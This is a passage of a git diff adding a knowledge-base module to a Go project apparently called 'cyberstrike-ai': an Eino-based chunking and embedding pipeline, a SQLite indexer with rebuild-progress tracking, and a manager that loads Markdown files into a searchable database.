strings.Contains(errStr, "timeout") || strings.Contains(errStr, "connection") || + strings.Contains(errStr, "network") || strings.Contains(errStr, "EOF") { + return true + } + return false +} + +// einoFloatEmbedder adapts [][]float32 embedder to Eino's [][]float64 [embedding.Embedder] for Indexer.Store. +type einoFloatEmbedder struct { + inner *Embedder +} + +func (w *einoFloatEmbedder) EmbedStrings(ctx context.Context, texts []string, opts ...embedding.Option) ([][]float64, error) { + vec32, err := w.inner.EmbedStrings(ctx, texts, opts...) + if err != nil { + return nil, err + } + out := make([][]float64, len(vec32)) + for i, row := range vec32 { + out[i] = make([]float64, len(row)) + for j, v := range row { + out[i][j] = float64(v) + } + } + return out, nil +} + +func (w *einoFloatEmbedder) GetType() string { + return "CyberStrikeKnowledgeEmbedder" +} + +func (w *einoFloatEmbedder) IsCallbacksEnabled() bool { + return false +} + +// EinoEmbeddingComponent returns an [embedding.Embedder] that uses the same retry/rate-limit path +// and produces float64 vectors expected by generic Eino indexer helpers. +func (e *Embedder) EinoEmbeddingComponent() embedding.Embedder { + return &einoFloatEmbedder{inner: e} +} diff --git a/internal/knowledge/index_pipeline.go b/internal/knowledge/index_pipeline.go new file mode 100644 index 00000000..a9b9a4c4 --- /dev/null +++ b/internal/knowledge/index_pipeline.go @@ -0,0 +1,91 @@ +package knowledge + +import ( + "context" + "database/sql" + "fmt" + "strings" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/components/document" + "github.com/cloudwego/eino/compose" + "github.com/cloudwego/eino/schema" +) + +// normalizeChunkStrategy returns "recursive" or "markdown_then_recursive". +func normalizeChunkStrategy(s string) string { + v := strings.TrimSpace(strings.ToLower(s)) + switch v { + case "recursive": + return "recursive" + case "markdown_then_recursive", "markdown_recursive", "markdown": + return "markdown_then_recursive" + case "": + return "markdown_then_recursive" + default: + return "markdown_then_recursive" + } +} + +func buildKnowledgeIndexChain( + ctx context.Context, + indexingCfg *config.IndexingConfig, + db *sql.DB, + recursive document.Transformer, + embeddingModel string, +) (compose.Runnable[[]*schema.Document, []string], error) { + if recursive == nil { + return nil, fmt.Errorf("recursive transformer is nil") + } + if db == nil { + return nil, fmt.Errorf("db is nil") + } + strategy := normalizeChunkStrategy("markdown_then_recursive") + batch := 64 + maxChunks := 0 + if indexingCfg != nil { + strategy = normalizeChunkStrategy(indexingCfg.ChunkStrategy) + if indexingCfg.BatchSize > 0 { + batch = indexingCfg.BatchSize + } + maxChunks = indexingCfg.MaxChunksPerItem + } + + si := NewSQLiteIndexer(db, batch, embeddingModel) + ch := compose.NewChain[[]*schema.Document, []string]() + if strategy != "recursive" { + md, err := newMarkdownHeaderSplitter(ctx) + if err != nil { + return nil, fmt.Errorf("markdown splitter: %w", err) + } + ch.AppendDocumentTransformer(md) + } + ch.AppendDocumentTransformer(recursive) + ch.AppendLambda(newChunkEnrichLambda(maxChunks)) + ch.AppendIndexer(si) + return ch.Compile(ctx) +} + +func newChunkEnrichLambda(maxChunks int) *compose.Lambda { + return compose.InvokableLambda(func(ctx context.Context, docs []*schema.Document) ([]*schema.Document, error) { + _ = ctx + out := make([]*schema.Document, 0, len(docs)) + for _, d := range docs { + if d == nil || strings.TrimSpace(d.Content) == "" { + continue + } + out = append(out, d) + } + if maxChunks > 0 && len(out) > maxChunks { + out = out[:maxChunks] + } + for i, d := range out { + if d.MetaData == nil { + d.MetaData = make(map[string]any) + } + d.MetaData[metaKBChunkIndex] = i + } + return out, nil + }) +} diff --git a/internal/knowledge/index_pipeline_test.go b/internal/knowledge/index_pipeline_test.go new file mode 100644 index 00000000..9e4b03fa --- /dev/null +++ b/internal/knowledge/index_pipeline_test.go @@ -0,0 +1,21 @@ +package knowledge + +import "testing" + +func TestNormalizeChunkStrategy(t *testing.T) { + cases := []struct { + in, want string + }{ + {"", "markdown_then_recursive"}, + {"recursive", "recursive"}, + {"RECURSIVE", "recursive"}, + {"markdown_then_recursive", "markdown_then_recursive"}, + {"markdown", "markdown_then_recursive"}, + {"unknown", "markdown_then_recursive"}, + } + for _, tc := range cases { + if got := normalizeChunkStrategy(tc.in); got != tc.want { + t.Errorf("normalizeChunkStrategy(%q) = %q, want %q", tc.in, got, tc.want) + } + } +} diff --git a/internal/knowledge/indexer.go b/internal/knowledge/indexer.go new file mode 100644 index 00000000..aeb6b9ff --- /dev/null +++ b/internal/knowledge/indexer.go @@ -0,0 +1,352 @@ +package knowledge + +import ( + "context" + "database/sql" + "fmt" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" + + fileloader "github.com/cloudwego/eino-ext/components/document/loader/file" + "github.com/cloudwego/eino/components/document" + "github.com/cloudwego/eino/components/indexer" + "github.com/cloudwego/eino/compose" + "github.com/cloudwego/eino/schema" + "go.uber.org/zap" +) + +// Indexer 使用 Eino Compose 索引链(Markdown/递归分块、Lambda enrich、SQLite 索引)与嵌入写入。 +type Indexer struct { + db *sql.DB + embedder *Embedder + logger *zap.Logger + chunkSize int + overlap int + indexingCfg *config.IndexingConfig + + indexChain compose.Runnable[[]*schema.Document, []string] + fileLoader *fileloader.FileLoader + + mu sync.RWMutex + lastError string + lastErrorTime time.Time + errorCount int + + rebuildMu sync.RWMutex + isRebuilding bool + rebuildTotalItems int + rebuildCurrent int + rebuildFailed int + rebuildStartTime time.Time + rebuildLastItemID string + rebuildLastChunks int +} + +// NewIndexer 创建索引器并编译 Eino 索引链;kcfg 为完整知识库配置(含 indexing 与路径相关行为)。 +func NewIndexer(ctx context.Context, db *sql.DB, embedder *Embedder, logger *zap.Logger, kcfg *config.KnowledgeConfig) (*Indexer, error) { + if db == nil { + return nil, fmt.Errorf("db is nil") + } + if embedder == nil { + return nil, fmt.Errorf("embedder is nil") + } + if err := EnsureKnowledgeEmbeddingsSchema(db); err != nil { + return nil, fmt.Errorf("knowledge_embeddings 结构迁移: %w", err) + } + if kcfg == nil { + kcfg = &config.KnowledgeConfig{} + } + indexingCfg := &kcfg.Indexing + + chunkSize := 512 + overlap := 50 + if indexingCfg.ChunkSize > 0 { + chunkSize = indexingCfg.ChunkSize + } + if indexingCfg.ChunkOverlap >= 0 { + overlap = indexingCfg.ChunkOverlap + } + + embedModel := embedder.EmbeddingModelName() + splitter, err := newKnowledgeSplitter(chunkSize, overlap, embedModel) + if err != nil { + return nil, fmt.Errorf("eino recursive splitter: %w", err) + } + + chain, err := buildKnowledgeIndexChain(ctx, indexingCfg, db, splitter, embedModel) + if err != nil { + return nil, fmt.Errorf("knowledge index chain: %w", err) + } + + var fl *fileloader.FileLoader + fl, err = fileloader.NewFileLoader(ctx, nil) + if err != nil { + if logger != nil { + logger.Warn("Eino FileLoader 初始化失败,prefer_source_file 将回退数据库正文", zap.Error(err)) + } + fl = nil + err = nil + } + + return &Indexer{ + db: db, + embedder: embedder, + logger: logger, + chunkSize: chunkSize, + overlap: overlap, + indexingCfg: indexingCfg, + indexChain: chain, + fileLoader: fl, + }, nil +} + +// RecompileIndexChain 在配置或嵌入模型变更后重建 Eino 索引链(无需重启进程)。 +func (idx *Indexer) RecompileIndexChain(ctx context.Context) error { + if idx == nil || idx.db == nil || idx.embedder == nil { + return fmt.Errorf("indexer 未初始化") + } + if err := EnsureKnowledgeEmbeddingsSchema(idx.db); err != nil { + return err + } + embedModel := idx.embedder.EmbeddingModelName() + splitter, err := newKnowledgeSplitter(idx.chunkSize, idx.overlap, embedModel) + if err != nil { + return fmt.Errorf("eino recursive splitter: %w", err) + } + chain, err := buildKnowledgeIndexChain(ctx, idx.indexingCfg, idx.db, splitter, embedModel) + if err != nil { + return fmt.Errorf("knowledge index chain: %w", err) + } + idx.indexChain = chain + return nil +} + +// IndexItem 索引单个知识项:先清空旧向量,再走 Compose 链(分块、嵌入、写入)。 +func (idx *Indexer) IndexItem(ctx context.Context, itemID string) error { + if idx.indexChain == nil { + return fmt.Errorf("索引链未初始化") + } + if idx.embedder == nil { + return fmt.Errorf("嵌入器未初始化") + } + + var content, category, title, filePath string + err := idx.db.QueryRow("SELECT content, category, title, file_path FROM knowledge_base_items WHERE id = ?", itemID).Scan(&content, &category, &title, &filePath) + if err != nil { + return fmt.Errorf("获取知识项失败:%w", err) + } + + if _, err := idx.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", itemID); err != nil { + return fmt.Errorf("删除旧向量失败:%w", err) + } + + body := strings.TrimSpace(content) + if idx.indexingCfg != nil && idx.indexingCfg.PreferSourceFile && strings.TrimSpace(filePath) != "" && idx.fileLoader != nil { + docs, lerr := idx.fileLoader.Load(ctx, document.Source{URI: strings.TrimSpace(filePath)}) + if lerr == nil && len(docs) > 0 { + var b strings.Builder + for i, d := range docs { + if d == nil { + continue + } + if i > 0 { + b.WriteString("\n\n") + } + b.WriteString(d.Content) + } + if s := strings.TrimSpace(b.String()); s != "" { + body = s + } + } else if idx.logger != nil { + idx.logger.Warn("优先源文件读取失败,使用数据库正文", + zap.String("itemId", itemID), + zap.String("path", filePath), + zap.Error(lerr)) + } + } + + root := &schema.Document{ + ID: itemID, + Content: body, + MetaData: map[string]any{ + metaKBCategory: category, + metaKBTitle: title, + metaKBItemID: itemID, + }, + } + + idxOpts := []indexer.Option{indexer.WithEmbedding(idx.embedder.EinoEmbeddingComponent())} + if idx.indexingCfg != nil && len(idx.indexingCfg.SubIndexes) > 0 { + idxOpts = append(idxOpts, indexer.WithSubIndexes(idx.indexingCfg.SubIndexes)) + } + + ids, err := idx.indexChain.Invoke(ctx, []*schema.Document{root}, compose.WithIndexerOption(idxOpts...)) + if err != nil { + msg := fmt.Sprintf("索引写入失败 (知识项:%s): %v", itemID, err) + idx.mu.Lock() + idx.lastError = msg + idx.lastErrorTime = time.Now() + idx.mu.Unlock() + return err + } + + if idx.logger != nil { + idx.logger.Info("知识项索引完成", zap.String("itemId", itemID), zap.Int("chunks", len(ids))) + } + idx.rebuildMu.Lock() + idx.rebuildLastItemID = itemID + idx.rebuildLastChunks = len(ids) + idx.rebuildMu.Unlock() + return nil +} + +// HasIndex 检查是否存在索引 +func (idx *Indexer) HasIndex() (bool, error) { + var count int + err := idx.db.QueryRow("SELECT COUNT(*) FROM knowledge_embeddings").Scan(&count) + if err != nil { + return false, fmt.Errorf("检查索引失败:%w", err) + } + return count > 0, nil +} + +// RebuildIndex 重建所有索引 +func (idx *Indexer) RebuildIndex(ctx context.Context) error { + idx.rebuildMu.Lock() + idx.isRebuilding = true + idx.rebuildTotalItems = 0 + idx.rebuildCurrent = 0 + idx.rebuildFailed = 0 + idx.rebuildStartTime = time.Now() + idx.rebuildLastItemID = "" + idx.rebuildLastChunks = 0 + idx.rebuildMu.Unlock() + + idx.mu.Lock() + idx.lastError = "" + idx.lastErrorTime = time.Time{} + idx.errorCount = 0 + idx.mu.Unlock() + + rows, err := idx.db.Query("SELECT id FROM knowledge_base_items") + if err != nil { + idx.rebuildMu.Lock() + idx.isRebuilding = false + idx.rebuildMu.Unlock() + return fmt.Errorf("查询知识项失败:%w", err) + } + defer rows.Close() + + var itemIDs []string + for rows.Next() { + var id string + if err := rows.Scan(&id); err != nil { + idx.rebuildMu.Lock() + idx.isRebuilding = false + idx.rebuildMu.Unlock() + return fmt.Errorf("扫描知识项 ID 失败:%w", err) + } + itemIDs = append(itemIDs, id) + } + + idx.rebuildMu.Lock() + idx.rebuildTotalItems = len(itemIDs) + idx.rebuildMu.Unlock() + + idx.logger.Info("开始重建索引", zap.Int("totalItems", len(itemIDs))) + + failedCount := 0 + consecutiveFailures := 0 + maxConsecutiveFailures := 5 + firstFailureItemID := "" + var firstFailureError error + + for i, itemID := range itemIDs { + if err := idx.IndexItem(ctx, itemID); err != nil { + failedCount++ + consecutiveFailures++ + + if consecutiveFailures == 1 { + firstFailureItemID = itemID + firstFailureError = err + idx.logger.Warn("索引知识项失败", + zap.String("itemId", itemID), + zap.Int("totalItems", len(itemIDs)), + zap.Error(err), + ) + } + + if consecutiveFailures >= maxConsecutiveFailures { + errorMsg := fmt.Sprintf("连续 %d 个知识项索引失败,可能存在配置问题(如嵌入模型配置错误、API 密钥无效、余额不足等)。第一个失败项:%s, 错误:%v", consecutiveFailures, firstFailureItemID, firstFailureError) + idx.mu.Lock() + idx.lastError = errorMsg + idx.lastErrorTime = time.Now() + idx.mu.Unlock() + + idx.logger.Error("连续索引失败次数过多,立即停止索引", + zap.Int("consecutiveFailures", consecutiveFailures), + zap.Int("totalItems", len(itemIDs)), + zap.Int("processedItems", i+1), + zap.String("firstFailureItemId", firstFailureItemID), + zap.Error(firstFailureError), + ) + return fmt.Errorf("连续索引失败次数过多:%v", firstFailureError) + } + + if failedCount > len(itemIDs)*3/10 && failedCount == len(itemIDs)*3/10+1 { + errorMsg := fmt.Sprintf("索引失败的知识项过多 (%d/%d),可能存在配置问题。第一个失败项:%s, 错误:%v", failedCount, len(itemIDs), firstFailureItemID, firstFailureError) + idx.mu.Lock() + idx.lastError = errorMsg + idx.lastErrorTime = time.Now() + idx.mu.Unlock() + + idx.logger.Error("索引失败的知识项过多,可能存在配置问题", + zap.Int("failedCount", failedCount), + zap.Int("totalItems", len(itemIDs)), + zap.String("firstFailureItemId", firstFailureItemID), + zap.Error(firstFailureError), + ) + } + continue + } + + if consecutiveFailures > 0 { + consecutiveFailures = 0 + firstFailureItemID = "" + firstFailureError = nil + } + + idx.rebuildMu.Lock() + idx.rebuildCurrent = i + 1 + idx.rebuildFailed = failedCount + idx.rebuildMu.Unlock() + + if (i+1)%10 == 0 || (len(itemIDs) > 0 && (i+1)*100/len(itemIDs)%10 == 0 && (i+1)*100/len(itemIDs) > 0) { + idx.logger.Info("索引进度", zap.Int("current", i+1), zap.Int("total", len(itemIDs)), zap.Int("failed", failedCount)) + } + } + + idx.rebuildMu.Lock() + idx.isRebuilding = false + idx.rebuildMu.Unlock() + + idx.logger.Info("索引重建完成", zap.Int("totalItems", len(itemIDs)), zap.Int("failedCount", failedCount)) + return nil +} + +// GetLastError 获取最近一次错误信息 +func (idx *Indexer) GetLastError() (string, time.Time) { + idx.mu.RLock() + defer idx.mu.RUnlock() + return idx.lastError, idx.lastErrorTime +} + +// GetRebuildStatus 获取重建索引状态 +func (idx *Indexer) GetRebuildStatus() (isRebuilding bool, totalItems int, current int, failed int, lastItemID string, lastChunks int, startTime time.Time) { + idx.rebuildMu.RLock() + defer idx.rebuildMu.RUnlock() + return idx.isRebuilding, idx.rebuildTotalItems, idx.rebuildCurrent, idx.rebuildFailed, idx.rebuildLastItemID, idx.rebuildLastChunks, idx.rebuildStartTime +} diff --git a/internal/knowledge/manager.go b/internal/knowledge/manager.go new file mode 100644 index 00000000..7309cc2a --- /dev/null +++ b/internal/knowledge/manager.go @@ -0,0 +1,885 @@ +package knowledge + +import ( + "database/sql" + "encoding/json" + "fmt" + "io/fs" + "os" + "path/filepath" + "strings" + "time" + + "github.com/google/uuid" + "go.uber.org/zap" +) + +// Manager 知识库管理器 +type Manager struct { + db *sql.DB + basePath string + logger *zap.Logger +} + +// NewManager 创建新的知识库管理器 +func NewManager(db *sql.DB, basePath string, logger *zap.Logger) *Manager { + return &Manager{ + db: db, + basePath: basePath, + logger: logger, + } +} + +// ScanKnowledgeBase 扫描知识库目录,更新数据库 +// 返回需要索引的知识项ID列表(新添加的或更新的) +func (m *Manager) ScanKnowledgeBase() ([]string, error) { + if m.basePath == "" { + return nil, fmt.Errorf("知识库路径未配置") + } + + // 确保目录存在 + if err := os.MkdirAll(m.basePath, 0755); err != nil { + return nil, fmt.Errorf("创建知识库目录失败: %w", err) + } + + var itemsToIndex []string + + // 遍历知识库目录 + err := filepath.WalkDir(m.basePath, func(path string, d fs.DirEntry, err error) error { + if err != nil { + return err + } + + // 跳过目录和非markdown文件 + if d.IsDir() || !strings.HasSuffix(strings.ToLower(path), ".md") { + return nil + } + + // 计算相对路径和分类 + relPath, err := filepath.Rel(m.basePath, path) + if err != nil { + return err + } + + // 第一个目录名作为分类(风险类型) + parts := strings.Split(relPath, string(filepath.Separator)) + category := "未分类" + if len(parts) > 1 { + category = parts[0] + } + + // 文件名为标题 + title := strings.TrimSuffix(filepath.Base(path), ".md") + + // 读取文件内容 + content, err := os.ReadFile(path) + if err != nil { + m.logger.Warn("读取知识库文件失败", zap.String("path", path), zap.Error(err)) + return nil // 继续处理其他文件 + } + + // 检查是否已存在 + var existingID string + var existingContent string + var existingUpdatedAt time.Time + err = m.db.QueryRow( + "SELECT id, content, updated_at FROM knowledge_base_items WHERE file_path = ?", + path, + ).Scan(&existingID, &existingContent, &existingUpdatedAt) + + if err == sql.ErrNoRows { + // 创建新项 + id := uuid.New().String() + now := time.Now() + _, err = m.db.Exec( + "INSERT INTO knowledge_base_items (id, category, title, file_path, content, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, category, title, path, string(content), now, now, + ) + if err != nil { + return fmt.Errorf("插入知识项失败: %w", err) + } + m.logger.Info("添加知识项", zap.String("id", id), zap.String("title", title), zap.String("category", category)) + // 新添加的项需要索引 + itemsToIndex = append(itemsToIndex, id) + } else if err == nil { + // 检查内容是否有变化 + contentChanged := existingContent != string(content) + if contentChanged { + // 更新现有项 + _, err = m.db.Exec( + "UPDATE knowledge_base_items SET category = ?, title = ?, content = ?, updated_at = ? WHERE id = ?", + category, title, string(content), time.Now(), existingID, + ) + if err != nil { + return fmt.Errorf("更新知识项失败: %w", err) + } + m.logger.Info("更新知识项", zap.String("id", existingID), zap.String("title", title)) + // 内容已更新的项需要重新索引 + itemsToIndex = append(itemsToIndex, existingID) + } else { + m.logger.Debug("知识项未变化,跳过", zap.String("id", existingID), zap.String("title", title)) + } + } else { + return fmt.Errorf("查询知识项失败: %w", err) + } + + return nil + }) + + if err != nil { + return nil, err + } + + return itemsToIndex, nil +} + +// GetCategories 获取所有分类(风险类型) +func (m *Manager) GetCategories() ([]string, error) { + rows, err := m.db.Query("SELECT DISTINCT category FROM knowledge_base_items ORDER BY category") + if err != nil { + return nil, fmt.Errorf("查询分类失败: %w", err) + } + defer rows.Close() + + var categories []string + for rows.Next() { + var category string + if err := rows.Scan(&category); err != nil { + return nil, fmt.Errorf("扫描分类失败: %w", err) + } + categories = append(categories, category) + } + + return categories, nil +} + +// GetStats 获取知识库统计信息 +func (m *Manager) GetStats() (int, int, error) { + // 获取分类总数 + categories, err := m.GetCategories() + if err != nil { + return 0, 0, fmt.Errorf("获取分类失败: %w", err) + } + totalCategories := len(categories) + + // 获取知识项总数 + var totalItems int + err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems) + if err != nil { + return totalCategories, 0, fmt.Errorf("获取知识项总数失败: %w", err) + } + + return totalCategories, totalItems, nil +} + +// GetCategoriesWithItems 按分类分页获取知识项(每个分类包含其下的所有知识项) +// limit: 每页分类数量(0表示不限制) +// offset: 偏移量(按分类偏移) +func (m *Manager) GetCategoriesWithItems(limit, offset int) ([]*CategoryWithItems, int, error) { + // 首先获取所有分类(带数量统计) + rows, err := m.db.Query(` + SELECT category, COUNT(*) as item_count + FROM knowledge_base_items + GROUP BY category + ORDER BY category + `) + if err != nil { + return nil, 0, fmt.Errorf("查询分类失败: %w", err) + } + defer rows.Close() + + // 收集所有分类信息 + type categoryInfo struct { + name string + itemCount int + } + var allCategories []categoryInfo + for rows.Next() { + var info categoryInfo + if err := rows.Scan(&info.name, &info.itemCount); err != nil { + return nil, 0, fmt.Errorf("扫描分类失败: %w", err) + } + allCategories = append(allCategories, info) + } + + totalCategories := len(allCategories) + + // 应用分页(按分类分页) + var paginatedCategories []categoryInfo + if limit > 0 { + start := offset + end := offset + limit + if start >= totalCategories { + paginatedCategories = []categoryInfo{} + } else { + if end > totalCategories { + end = totalCategories + } + paginatedCategories = allCategories[start:end] + } + } else { + paginatedCategories = allCategories + } + + // 为每个分类获取其下的知识项(只返回摘要,不包含完整内容) + result := make([]*CategoryWithItems, 0, len(paginatedCategories)) + for _, catInfo := range paginatedCategories { + // 获取该分类下的所有知识项 + items, _, err := m.GetItemsSummary(catInfo.name, 0, 0) + if err != nil { + return nil, 0, fmt.Errorf("获取分类 %s 的知识项失败: %w", catInfo.name, err) + } + + result = append(result, &CategoryWithItems{ + Category: catInfo.name, + ItemCount: catInfo.itemCount, + Items: items, + }) + } + + return result, totalCategories, nil +} + +// GetItems 获取知识项列表(完整内容,用于向后兼容) +func (m *Manager) GetItems(category string) ([]*KnowledgeItem, error) { + return m.GetItemsWithOptions(category, 0, 0, true) +} + +// GetItemsWithOptions 获取知识项列表(支持分页和可选内容) +// category: 分类筛选(空字符串表示所有分类) +// limit: 每页数量(0表示不限制) +// offset: 偏移量 +// includeContent: 是否包含完整内容(false时只返回摘要) +func (m *Manager) GetItemsWithOptions(category string, limit, offset int, includeContent bool) ([]*KnowledgeItem, error) { + var rows *sql.Rows + var err error + + // 构建SQL查询 + var query string + var args []interface{} + + if includeContent { + query = "SELECT id, category, title, file_path, content, created_at, updated_at FROM knowledge_base_items" + } else { + query = "SELECT id, category, title, file_path, created_at, updated_at FROM knowledge_base_items" + } + + if category != "" { + query += " WHERE category = ?" + args = append(args, category) + } + + query += " ORDER BY category, title" + + if limit > 0 { + query += " LIMIT ?" + args = append(args, limit) + if offset > 0 { + query += " OFFSET ?" + args = append(args, offset) + } + } + + rows, err = m.db.Query(query, args...) + if err != nil { + return nil, fmt.Errorf("查询知识项失败: %w", err) + } + defer rows.Close() + + var items []*KnowledgeItem + for rows.Next() { + item := &KnowledgeItem{} + var createdAt, updatedAt string + + if includeContent { + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &item.Content, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描知识项失败: %w", err) + } + } else { + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描知识项失败: %w", err) + } + // 不包含内容时,Content为空字符串 + item.Content = "" + } + + // 解析时间 - 支持多种格式 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + // 解析创建时间 + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + // 解析更新时间 + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + // 如果更新时间为空,使用创建时间 + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + items = append(items, item) + } + + return items, nil +} + +// GetItemsCount 获取知识项总数 +func (m *Manager) GetItemsCount(category string) (int, error) { + var count int + var err error + + if category != "" { + err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items WHERE category = ?", category).Scan(&count) + } else { + err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&count) + } + + if err != nil { + return 0, fmt.Errorf("查询知识项总数失败: %w", err) + } + + return count, nil +} + +// SearchItemsByKeyword 按关键字搜索知识项(在所有数据中搜索,支持标题、分类、路径、内容匹配) +func (m *Manager) SearchItemsByKeyword(keyword string, category string) ([]*KnowledgeItemSummary, error) { + if keyword == "" { + return nil, fmt.Errorf("搜索关键字不能为空") + } + + // 构建SQL查询,使用LIKE进行关键字匹配(不区分大小写) + var query string + var args []interface{} + + // SQLite的LIKE不区分大小写,使用COLLATE NOCASE或LOWER()函数 + // 使用%keyword%进行模糊匹配 + searchPattern := "%" + keyword + "%" + + query = ` + SELECT id, category, title, file_path, created_at, updated_at + FROM knowledge_base_items + WHERE (LOWER(title) LIKE LOWER(?) OR LOWER(category) LIKE LOWER(?) OR LOWER(file_path) LIKE LOWER(?) OR LOWER(content) LIKE LOWER(?)) + ` + args = append(args, searchPattern, searchPattern, searchPattern, searchPattern) + + // 如果指定了分类,添加分类过滤 + if category != "" { + query += " AND category = ?" + args = append(args, category) + } + + query += " ORDER BY category, title" + + rows, err := m.db.Query(query, args...) + if err != nil { + return nil, fmt.Errorf("搜索知识项失败: %w", err) + } + defer rows.Close() + + var items []*KnowledgeItemSummary + for rows.Next() { + item := &KnowledgeItemSummary{} + var createdAt, updatedAt string + + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil { + return nil, fmt.Errorf("扫描知识项失败: %w", err) + } + + // 解析时间 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + items = append(items, item) + } + + return items, nil +} + +// GetItemsSummary 获取知识项摘要列表(不包含完整内容,支持分页) +func (m *Manager) GetItemsSummary(category string, limit, offset int) ([]*KnowledgeItemSummary, int, error) { + // 获取总数 + total, err := m.GetItemsCount(category) + if err != nil { + return nil, 0, err + } + + // 获取列表数据(不包含内容) + var rows *sql.Rows + var query string + var args []interface{} + + query = "SELECT id, category, title, file_path, created_at, updated_at FROM knowledge_base_items" + + if category != "" { + query += " WHERE category = ?" + args = append(args, category) + } + + query += " ORDER BY category, title" + + if limit > 0 { + query += " LIMIT ?" + args = append(args, limit) + if offset > 0 { + query += " OFFSET ?" + args = append(args, offset) + } + } + + rows, err = m.db.Query(query, args...) + if err != nil { + return nil, 0, fmt.Errorf("查询知识项失败: %w", err) + } + defer rows.Close() + + var items []*KnowledgeItemSummary + for rows.Next() { + item := &KnowledgeItemSummary{} + var createdAt, updatedAt string + + if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil { + return nil, 0, fmt.Errorf("扫描知识项失败: %w", err) + } + + // 解析时间 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + items = append(items, item) + } + + return items, total, nil +} + +// GetItem 获取单个知识项 +func (m *Manager) GetItem(id string) (*KnowledgeItem, error) { + item := &KnowledgeItem{} + var createdAt, updatedAt string + err := m.db.QueryRow( + "SELECT id, category, title, file_path, content, created_at, updated_at FROM knowledge_base_items WHERE id = ?", + id, + ).Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &item.Content, &createdAt, &updatedAt) + + if err == sql.ErrNoRows { + return nil, fmt.Errorf("知识项不存在") + } + if err != nil { + return nil, fmt.Errorf("查询知识项失败: %w", err) + } + + // 解析时间 - 支持多种格式 + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + // 解析创建时间 + if createdAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, createdAt) + if err == nil && !parsed.IsZero() { + item.CreatedAt = parsed + break + } + } + } + + // 解析更新时间 + if updatedAt != "" { + for _, format := range timeFormats { + parsed, err := time.Parse(format, updatedAt) + if err == nil && !parsed.IsZero() { + item.UpdatedAt = parsed + break + } + } + } + + // 如果更新时间为空,使用创建时间 + if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() { + item.UpdatedAt = item.CreatedAt + } + + return item, nil +} + +// CreateItem 创建知识项 +func (m *Manager) CreateItem(category, title, content string) (*KnowledgeItem, error) { + id := uuid.New().String() + now := time.Now() + + // 构建文件路径 + filePath := filepath.Join(m.basePath, category, title+".md") + + // 确保目录存在 + if err := os.MkdirAll(filepath.Dir(filePath), 0755); err != nil { + return nil, fmt.Errorf("创建目录失败: %w", err) + } + + // 写入文件 + if err := os.WriteFile(filePath, []byte(content), 0644); err != nil { + return nil, fmt.Errorf("写入文件失败: %w", err) + } + + // 插入数据库 + _, err := m.db.Exec( + "INSERT INTO knowledge_base_items (id, category, title, file_path, content, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, category, title, filePath, content, now, now, + ) + if err != nil { + return nil, fmt.Errorf("插入知识项失败: %w", err) + } + + return &KnowledgeItem{ + ID: id, + Category: category, + Title: title, + FilePath: filePath, + Content: content, + CreatedAt: now, + UpdatedAt: now, + }, nil +} + +// UpdateItem 更新知识项 +func (m *Manager) UpdateItem(id, category, title, content string) (*KnowledgeItem, error) { + // 获取现有项 + item, err := m.GetItem(id) + if err != nil { + return nil, err + } + + // 构建新文件路径 + newFilePath := filepath.Join(m.basePath, category, title+".md") + + // 如果路径改变,需要移动文件 + if item.FilePath != newFilePath { + // 